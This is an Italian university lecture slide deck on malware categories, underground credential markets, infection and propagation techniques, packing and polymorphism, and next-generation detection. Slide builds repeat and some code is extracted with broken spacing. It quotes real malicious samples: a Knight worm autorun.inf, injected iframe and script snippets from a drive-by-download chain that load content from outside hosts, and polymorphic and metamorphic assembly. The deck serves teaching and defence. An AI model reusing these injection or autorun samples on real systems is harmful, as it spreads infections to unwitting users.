Malware e underground economy
Transcript
Malware e underground economy
Malware e underground economy Roberto Paleari [email protected] Università degli Studi di Milano Introduzione R. Paleari, A. Fattori Malware e underground economy 2 Malware Sequenza di codice progettata per danneggiare intenzionalmente un sistema, i dati che contiene o comunque alterare il suo normale funzionamento, all’insaputa dell’utente R. Paleari, A. Fattori Malware e underground economy 3 Replicazione autonoma No replicazione Replicazione Tipologie di malware Virus Root-kit Worm Dialer Spyware Trojan horse Necessita ospite Keylogger Nessun ospite Dipendenza da ospite R. Paleari, A. Fattori Malware e underground economy 4 Tipologie di malware Virus & worm Virus Replicazione autonoma Necessitano di un ospite in cui inserirsi Propagazione attraverso la diffusione dell’ospite Worm Non necessitano di un ospite Propagazione autonoma attraverso la rete Capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità R. Paleari, A. Fattori Malware e underground economy 5 Tipologie di malware Virus & worm Virus Replicazione autonoma Necessitano di un ospite in cui inserirsi Propagazione attraverso la diffusione dell’ospite Riproduzione Worm Payload Infezione Non necessitano di un ospite Propagazione autonoma attraverso la rete Capacità di propagarsi in sistemi altrui sfruttando delle vulnerabilità R. Paleari, A. Fattori Malware e underground economy 5 Tipologie di malware Trojan horse & backdoor Trojan horse Funzionalità maligne cammuffate tra altre benigne Propagazione manuale: diffusione di applicazioni con funzionalità “secondarie” o inserimento di nuove funzionalità in applicazioni esistenti Rientrano in questa categoria adware e spyware R. Paleari, A. Fattori Malware e underground economy 6 Tipologie di malware Trojan horse & backdoor Trojan horse Funzionalità maligne cammuffate tra altre benigne Propagazione manuale: diffusione di applicazioni con funzionalità “secondarie” o inserimento di nuove funzionalità in applicazioni esistenti Rientrano in questa categoria adware e spyware Backdoor Per assicurare l’accesso ad un sistema compromesso Rientrano in questa categoria i RAT (Remote Access Trojan) R. Paleari, A. Fattori Malware e underground economy 6 Tipologie di malware Trojan horse & backdoor Trojan horse Funzionalità maligne cammuffate tra altre benigne Propagazione manuale: diffusione di applicazioni con funzionalità “secondarie” o inserimento di nuove funzionalità in applicazioni esistenti Rientrano in questa categoria adware e spyware Backdoor Per assicurare l’accesso ad un sistema compromesso Rientrano in questa categoria i RAT (Remote Access Trojan) Root-kit Strumenti utilizzati per mantenere l’accesso ad un sistema compromesso senza fare nascere sospetti Utilizzati per nascondere file, processi, connessioni di rete, . . . Sia a livello kernel che a livello utente R. Paleari, A. Fattori Malware e underground economy 6 Nuove minacce 1800000 1600000 Number of new threats 1400000 1200000 1000000 800000 600000 400000 200000 0 J n- Ja un un ec l-D Ju J n- Ja un ec l-D Ju J n- Ja 09 20 08 20 08 20 07 20 07 20 Period Fonte: Symantec R. Paleari, A. Fattori Malware e underground economy 7 Malware & underground economy R. Paleari, A. Fattori Malware e underground economy 8 Phishing R. Paleari, A. Fattori Malware e underground economy 9 Phishing R. Paleari, A. Fattori Malware e underground economy 9 Scam R. Paleari, A. Fattori Malware e underground economy 10 Come funziona? 1. Campagna di spam R. Paleari, A. Fattori Malware e underground economy 11 Come funziona? 1. Campagna di spam 2. Social engineering GET /... R. Paleari, A. Fattori Malware e underground economy 11 Come funziona? 1. Campagna di spam 2. Social engineering 3. Furto credenziali & malware R. Paleari, A. Fattori Malware e underground economy 11 Come funziona? 1. Campagna di spam 2. Social engineering 3. Furto credenziali & malware 4. Infezione macchine R. Paleari, A. Fattori Malware e underground economy 11 Underground economy Vendita informazioni rubate Goods & services Bank accounts Credit cards Full identities Online auction site accounts Scams Mailers Email addresses Email passwords Drop (request or offer) Proxies Percentage 22% 13% 9% 7% 7% 6% 5% 5% 5% 5% Range of prices $10-$1000 $0.40-$20 $1-$15 $1-$8 $2.50-$50/week (hosting) $1-$10 $0.83/MB-$10/MB $4-$30 10%-20% of drop amount $1.50-$30 Fonte: Symantec R. Paleari, A. Fattori Malware e underground economy 12 Underground economy Furto credenziali – Portata del fenomeno Università di Mannheim – Limbo & ZeuS ∼ 70 dropzone 33 GB di dati 11000 account bancari, 150000 account mail Dropzone webpinkXXX.cn coXXX-google.cn 77.XXX.159.202 finXXXonline.com Other Total # Machines 26,150 12,460 10,394 6,932 108,122 164,058 Data amount 1.5 GB 1.2 GB 503 MB 438 MB 24.4 GB 28.0 GB Country China Malaysia Russia Estonia Fonte: Learning More About the Underground Economy – T. Holz, M. Engelberth, F. Freiling, 2008 R. Paleari, A. Fattori Malware e underground economy 13 Underground economy “Malware as a service” Bot in affitto (∼ $1000-$2000/mese) MPACK: exploit toolkit a ∼ $1000 R. Paleari, A. Fattori Malware e underground economy 14 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR, . . . R. Paleari, A. Fattori Malware e underground economy 15 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR, . . . Soluzioni migliori? R. Paleari, A. Fattori Malware e underground economy 15 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR, . . . Soluzioni migliori? “Human computation”! > 100K captcha al giorno, $1.5-$8 per 1000 captcha R. Paleari, A. Fattori Malware e underground economy 15 Underground economy The spam business CAPTCHA? OCR, Fuzzy OCR, . . . Soluzioni migliori? “Human computation”! R. Paleari, A. Fattori Malware e underground economy 15 Funzionalità del malware Non solo spam. . . Mass-mailing (Sobig) HTTP/SOCKS proxy (MyDoom) SMTP proxy (Taripox, Happy99) Diffusione tramite IM (Peacomm) R. Paleari, A. Fattori Malware e underground economy 16 Funzionalità del malware Furto credenziali Obiettivi Credenziali account bancari/posta Serial prodotti commerciali (Agobot) E-mail harvesting Come? Installazione plugin BHO/XUL Modifica C:\Windows\...\etc\hosts Keylogging Screen grabbing R. Paleari, A. Fattori Malware e underground economy 17 Funzionalità del malware Click fraud Google: 10% dei “click” sono fraudolenti (∼ $1B) Clickbot.A (∼ 50k host infetti) Molti “clickbot” commerciali ClickJacking R. Paleari, A. Fattori Malware e underground economy 18 Funzionalità del malware Anti-anti-virus Kill processi in esecuzione Vari hook per auto-start prima dell’AV Impedire aggiornamento AV Corruzione DB signature Kernel-level callback via PsSetLoadImageNotifyRoutine() ... R. Paleari, A. Fattori Malware e underground economy 19 Funzionalità del malware Botnet . . . argomento della prossima lezione R. Paleari, A. Fattori Malware e underground economy 20 Tecniche di infezione File/device infection File infection Tecnicamente complesso con PE Virut → EPO file infector Entry Programma Infezione Programma Virus R. Paleari, A. Fattori Malware e underground economy Entry 21 Tecniche di infezione File/device infection File infection Infezione device removibili Knight: autorun.inf [autorun] open=Knight.exe open icon=Knight.exe,0 shellexecute=Knight.exe open shell=auto action=Disk Knight(Protection Against Mobile Disk Viruses) shell\auto=&Auto shell\auto\command=Knight.exe open shell\open=&Open shell\open\command=Knight.exe open shell\explore=E&xplore shell\explore\command=Knight.exe open shell\find=S&earch... shell\find\command=Knight.exe open ... R. Paleari, A. Fattori Malware e underground economy 21 Tecniche di infezione File/device infection Root-kit File infection Infezione device removibili User vs kernel level Obiettivo: nascondere processi, file, connessioni di rete, . . . Hooking a diversi livelli (IDT,SSDT,DKOM,. . . ) “Attacking SMM Memory via Intel CPU Cache Poisoning” (19/3/2009) R. Paleari, A. Fattori EPROCESS EPROCESS EPROCESS csrss.exe malware.exe svchost.exe Malware e underground economy 21 Tecniche di infezione File/device infection Root-kit File infection Infezione device removibili User vs kernel level Obiettivo: nascondere processi, file, connessioni di rete, . . . Hooking a diversi livelli (IDT,SSDT,DKOM,. . . ) “Attacking SMM Memory via Intel CPU Cache Poisoning” (19/3/2009) R. Paleari, A. Fattori EPROCESS EPROCESS EPROCESS csrss.exe malware.exe svchost.exe Malware e underground economy 21 Tecniche di infezione File/device infection File infection Root-kit Infezione device removibili R. Paleari, A. Fattori Malware e underground economy 21 Tecniche di infezione File/device infection File infection Root-kit Infezione device removibili MBR/boot infection Trojan.Mebroot (11/2007) Infezione \\.\PhysicalDrive{0-15} (⇒ compresi device USB) Root-kit, furto credenziali bancarie “This malware is very professionally written and produced” (F-Secure) R. Paleari, A. Fattori Malware e underground economy 21 Tecniche di propagazione Propagation mechanisms File sharing executables File transfer/email attachment File transfer/CIFS File sharing/P2P Remotely exploitable vulnerability SQL Back door/Kuang2 Back door/SubSeven File transfer/embedded HTTP URI/Yahoo! Messenger Web Percentage 40% 32% 28% 19% 17% 3% 3% 3% 2% 1% Fonte: Symantec, 2007 R. Paleari, A. Fattori Malware e underground economy 22 Tecniche di propagazione Rogue Antivirus R. Paleari, A. Fattori Malware e underground economy 23 Tecniche di propagazione Rogue Antivirus R. Paleari, A. Fattori Malware e underground economy 23 Tecniche di propagazione Rogue Antivirus R. Paleari, A. Fattori Malware e underground economy 23 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari, A. Fattori Malware e underground economy 24 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari, A. Fattori Malware e underground economy 25 Tecniche di propagazione Remote exploit + drive-by-download Link a JS maligno nel sito Exploit MS06-014 + MS07-004 Download keylogger/backdoor ∼ 3 giorni prima del Super Bowl! R. Paleari, A. Fattori Malware e underground economy 25 Tecniche di propagazione Remote exploit + drive-by-download R. Paleari, A. Fattori Malware e underground economy 26 Tecniche di propagazione Remote exploit + drive-by-download <iframe> maligno Download binario da you69tube.com Information-stealing (variante di Zbot?) Exploit PDF (overflow) “If you screw around with Paris you might get a virus. . . ” Commento su ZDNet R. Paleari, A. Fattori Malware e underground economy 26 Tecniche di propagazione Remote exploit + drive-by-download – Un esempio “live” Ricerca sito vulnerabile I I R. Paleari, A. Fattori Trend attuale: compromissione di siti “famosi” Molti visitatori ⇒ molte vittime Malware e underground economy 27 Tecniche di propagazione Remote exploit + drive-by-download – Un esempio “live” Ricerca sito vulnerabile I I Trend attuale: compromissione di siti “famosi” Molti visitatori ⇒ molte vittime Compromissione sito (SQLI) R. Paleari, A. Fattori Malware e underground economy 27 Tecniche di propagazione Remote exploit + drive-by-download – Un esempio “live” Ricerca sito vulnerabile I I Trend attuale: compromissione di siti “famosi” Molti visitatori ⇒ molte vittime Compromissione sito (SQLI) R. Paleari, A. Fattori Malware e underground economy 27 Tecniche di propagazione Remote exploit + drive-by-download – Un esempio “live” Ricerca sito vulnerabile I I Trend attuale: compromissione di siti “famosi” Molti visitatori ⇒ molte vittime Compromissione sito (SQLI) h.js document . w r i t e ( ”<i f r a m e s r c =’ h t t p : / / . . . / 0 5 0 0 a d m i n /News/ f a q . htm’></ i f r a m e >” ) ; document . w r i t e ( ”<i f r a m e s r c =’ h t t p : / / . . . / i . htm’></ i f r a m e >” ) ; faq.htm <i f r a m e s r c=h t t p : / / . . . / i . htm w i d t h =100 h e i g h t =0></ i f r a m e> <s c r i p t s r c=” h t t p : / / c o u n t 4 9 . 5 1 y e s . com/ c l i c k . a s p x ? i d =494953024& l o g o =11”></ s c r i p t> i.htm <s c r i p t> . . . e x p l o i t . . .</ s c r i p t> <s c r i p t s r c=” h t t p : / / c o u n t 4 8 . 5 1 y e s . com/ c l i c k . a s p x ? i d =480917198& l o g o =1”></ s c r i p t> R. Paleari, A. Fattori Malware e underground economy 27 Tecniche di propagazione Remote exploit + drive-by-download – Un esempio “live” Ricerca sito vulnerabile I I Trend attuale: compromissione di siti “famosi” Molti visitatori ⇒ molte vittime Compromissione sito (SQLI) . . . aspettare . . . R. Paleari, A. Fattori Malware e underground economy 27 Soluzioni? R. Paleari, A. Fattori Malware e underground economy 28 Soluzioni? R. Paleari, A. Fattori Malware e underground economy 28 Situazione attuale Malware vs AV AV in posizione svantaggiata The amount of new malware has never been higher. Our labs are receiving an average of 25,000 malware samples every day, seven days a week. F-Secure, 2008 R. Paleari, A. Fattori Malware e underground economy 29 Perchè una cosı́ grande diffusione? Omogeneità, connettività e configurazione R. Paleari, A. Fattori Malware e underground economy 30 Perchè una cosı́ grande diffusione? Omogeneità, connettività e configurazione Scarsa attenzione R. Paleari, A. Fattori Malware e underground economy 30 Perchè una cosı́ grande diffusione? Omogeneità, connettività e configurazione Scarsa attenzione Incentivo economico R. Paleari, A. Fattori Malware e underground economy 30 Situazione malware detector Signature-based detectors Fonte: Testing Malware Detectors – M. Christodorescu, S. Jha, 2004 R. Paleari, A. Fattori Malware e underground economy 31 Situazione malware detector . . . qualche dato più recente Rank 1 2 3 4 5 6 7 8 9 10 Detected 91% 91% 90% 90% 90% 89% 88% 88% 87% 87% Missed 178 179 194 195 202 213 241 247 259 268 Product Sophos AntiVir Microsoft AVG Ikarus BitDefender Norman TrendMicro Kaspersky F-Secure Fonte: SRI International + VirusTotal, campione di 2064 malware R. Paleari, A. Fattori Malware e underground economy 32 Tecniche di self-defense Packing Codice maligno nascosto da 1+ layer di compressione/cifratura Decompressione/decrifratura a runtime R. Paleari, A. Fattori Malware e underground economy 33 Tecniche di self-defense Packing Codice maligno nascosto da 1+ layer di compressione/cifratura Decompressione/decrifratura a runtime Malicious code R. Paleari, A. Fattori Malware e underground economy 33 Tecniche di self-defense Packing Codice maligno nascosto da 1+ layer di compressione/cifratura Decompressione/decrifratura a runtime Unpacking routine R. Paleari, A. Fattori Malicious code Malware e underground economy 33 Tecniche di self-defense Packing Codice maligno nascosto da 1+ layer di compressione/cifratura Decompressione/decrifratura a runtime Unpacking Unpacking routine routine R. Paleari, A. Fattori Malicious code Malware e underground economy 33 Tecniche di self-defense Packing Codice maligno nascosto da 1+ layer di compressione/cifratura Decompressione/decrifratura a runtime Unpacking Unpacking routine routine Malicious code Problema ∼ 80% del malware è “packed” 200 famiglie di packer, 2000 varianti Backlog di ∼ 90 famiglie Fonte: Symantec, 2008 R. Paleari, A. Fattori Malware e underground economy 33 Tecniche di self-defense Polimorfismo Ancora corpo cifrato Il malware è in grado di mutare la routine di cifratura Esempio lea si , corpo virus nop mov sp , 0682 h sub ax, bx ciclo : xor [ si ] , si inc cx xor [ s i ] , sp inc si add bx, cx dec sp jnz ciclo corpo virus : ... R. Paleari, A. Fattori Le istruzioni evidenziate sono “junk code” Possibile anche instruction reordering, instruction substitution, register replacement, . . . Elevato numero di mutazioni possibili Difficile individuare una signature costante Malware e underground economy 34 Tecniche di self-defense Metamorfismo “Metamorphics are body-polymorphics” (Igor Muttik) W95/Regswap 5A BF04000000 8BF5 B80C000000 81 C288000000 8B1A pop mov mov mov add mov edx edi ,0004 h e s i , ebp eax , 0 0 0 Ch edx , 0 0 8 8 h ebx , [ edx ] 58 BB04000000 8BD5 BF0C000000 81 C088000000 8B30 pop mov mov mov add mov eax ebx , 0 0 0 4 h edx , ebp e d i , 0 0 0 Ch eax , 0 0 8 8 h e s i , [ eax ] W32/Evol BF0F000055 893E 5F 52 B640 BA8BEC5151 53 8BDA 895 E04 R. Paleari, A. Fattori mov mov pop push mov mov push mov mov e d i , 5 5 0 0 0 0 0 Fh [ esi ] , edi edi edx dh , 4 0 edx , 5 1 5 1 EC8Bh ebx ebx , edx [ e s i + 00 0 4 ] , ebx BB0F000055 891E 5B 51 B9CB00C05F 81 C1C0EB91F1 894 E04 mov mov pop push mov add mov Malware e underground economy ebx , 5 5 0 0 0 0 0 Fh [ e s i ] , ebx ebx ecx ecx , 5 FC000CBh ecx , F191EBC0h [ e s i + 0 00 4 ] , e c x 35 Tecniche di self-defense Implementazione difficile? R. Paleari, A. Fattori Malware e underground economy 36 Tecniche di self-defense Implementazione difficile? R. Paleari, A. Fattori Malware e underground economy 36 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program R. Paleari, A. Fattori Malware e underground economy 37 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program R. Paleari, A. Fattori ???? Malware e underground economy 37 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program ???? ???? R. Paleari, A. Fattori Malware e underground economy 37 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program ???? ???? R. Paleari, A. Fattori Malware e underground economy Malicious 37 Next-generation malware detector Situazione attuale: Algorithmic unpacking Malware detector Malicious program ???? ???? Malicious Problemi Ogni packer richiede un unpacker specifico Troppe famiglie di packer Symantec: da 6 ore a 6 mesi per packer Multi-layer packing R. Paleari, A. Fattori Malware e underground economy 37 Next-generation malware detector Unpacking generico Idea Analisi dinamica Emulazione/tracing dell’esecuzione fino al termine della routine di unpacking R. Paleari, A. Fattori Malware e underground economy 38 Next-generation malware detector Unpacking generico Idea Analisi dinamica Emulazione/tracing dell’esecuzione fino al termine della routine di unpacking Packed code R. Paleari, A. Fattori Malware e underground economy 38 Next-generation malware detector Unpacking generico Idea Analisi dinamica Emulazione/tracing dell’esecuzione fino al termine della routine di unpacking Packed code R. Paleari, A. Fattori Malware e underground economy 38 Next-generation malware detector Unpacking generico Idea Analisi dinamica Emulazione/tracing dell’esecuzione fino al termine della routine di unpacking Packed code R. Paleari, A. Fattori Malware e underground economy 38 Next-generation malware detector Unpacking generico Idea Analisi dinamica Emulazione/tracing dell’esecuzione fino al termine della routine di unpacking Packed code R. Paleari, A. Fattori Malware e underground economy 38 Next-generation malware detector Unpacking generico Idea Analisi dinamica Emulazione/tracing dell’esecuzione fino al termine della routine di unpacking Unpacked code Packed code Un po’ di nomi. . . OmniUnpack Renovo Justin PolyUnpack R. Paleari, A. Fattori Malware e underground economy 38 Next-generation malware detector Analisi comportamentale Signature-based detection è troppo debole ⇒ verso tecniche più “semantiche” R. Paleari, A. Fattori Malware e underground economy 39 Next-generation malware detector Analisi comportamentale Signature-based detection è troppo debole ⇒ verso tecniche più “semantiche” Soluzioni Analisi dinamica Granularità a livello di system call NovaShield, ThreatFire, Sana Security, . . . Problemi Performance Falsi positivi Information leakage ... R. Paleari, A. Fattori Malware e underground economy 39 Remediation Detection non è sempre possibile Remediation dell’infezione . . . ma funziona? R. Paleari, A. Fattori Malware e underground economy 40 Remediation Detection non è sempre possibile Remediation dell’infezione . . . ma funziona? R. Paleari, A. Fattori Malware e underground economy 40 Malware & underground economy Domande? Roberto Paleari [email protected] Università degli Studi di Milano R. Paleari, A. Fattori Malware e underground economy 41
Documenti analoghi
lezione 22 - malware
Il modo in cui i worm si diffondono è più complesso di quello dei virus e dei
trojan horse.
In particolare, i worm sono in grado di diffondersi da un sistema all'altro
in modo del tutto autonomo, i...